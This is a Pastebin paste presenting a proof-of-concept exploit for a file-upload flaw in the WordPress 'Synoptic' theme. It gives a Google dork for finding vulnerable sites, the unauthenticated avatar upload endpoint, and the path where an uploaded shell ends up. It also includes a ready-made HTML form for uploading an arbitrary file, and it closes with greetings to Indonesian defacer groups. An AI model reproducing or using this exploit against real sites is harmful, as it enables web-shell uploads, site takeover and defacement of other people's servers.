daily pastebin goal
80%
SHARE
TWEET

[POC] Wordpress Themes Synoptic Shell Upload Vulnerability

Berandal666 Mar 11th, 2017 298 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #################################################################################
  2. # Wordpress Themes Synoptic Shell Upload Vulnerability | CSRF
  3. # Author : Berandal
  4. # Google Dork: inurl:/wp-content/themes/synoptic/
  5. # Tested on: Win 7, Linux
  6. # Blog : http://www.maxteroit.com/
  7. #################################################################################
  8.  
  9. +-+-+-+-+-+-+-+-+
  10. |B|e|r|a|n|d|a|l|
  11. +-+-+-+-+-+-+-+-+
  12.  
  13. # [!] Exploit : http://127.0.0.1/wp-content/themes/synoptic/lib/avatarupload/upload.php
  14.  
  15. # [!] File Location : http://127.0.0.1/wp-content/uploads/markets/avatars/shellname
  16.  
  17. #################################################################################
  18. #[*] CSRF:
  19. #################################################################################
  20. <html>
  21. <body>
  22. <form enctype="multipart/form-data" action="127.0.0.1/wp-content/themes/synoptic/lib/avatarupload/upload.php" method="post">
  23. Your File: <input name="qqfile" type="file" /><br />
  24. <input type="submit" value="SIKAT!" />
  25. </form>
  26. </body>
  27. </html>
  28. #################################################################################
  29. # [*] ABOUT:
  30. #################################################################################
  31. # Facebook: https://www.facebook.com/owlsquad.id
  32. # Twitter: https://www.twitter.com/id_berandal
  33. # Greetz : All Official Member OWL SQUAD - Hacker Patah Hati - Alone Clown Security - and All Indonesian Defacer.
  34. #################################################################################
RAW Paste Data
Top